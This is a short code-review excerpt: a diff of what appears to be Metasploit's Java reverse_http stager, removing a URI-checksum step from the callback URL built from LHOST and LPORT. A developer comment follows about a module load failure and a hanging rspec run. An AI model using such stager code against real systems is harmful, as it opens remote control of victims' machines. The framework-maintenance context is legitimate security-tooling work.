modules/payloads/stagers/java/reverse_http.rb

```diff
@@ -53,8 +53,8 @@ def config
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/"
-    c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
```

Comment:
I changed it to `:init_java`. I'm still getting `Failed to load module:` and `rspec -fd` still hangs.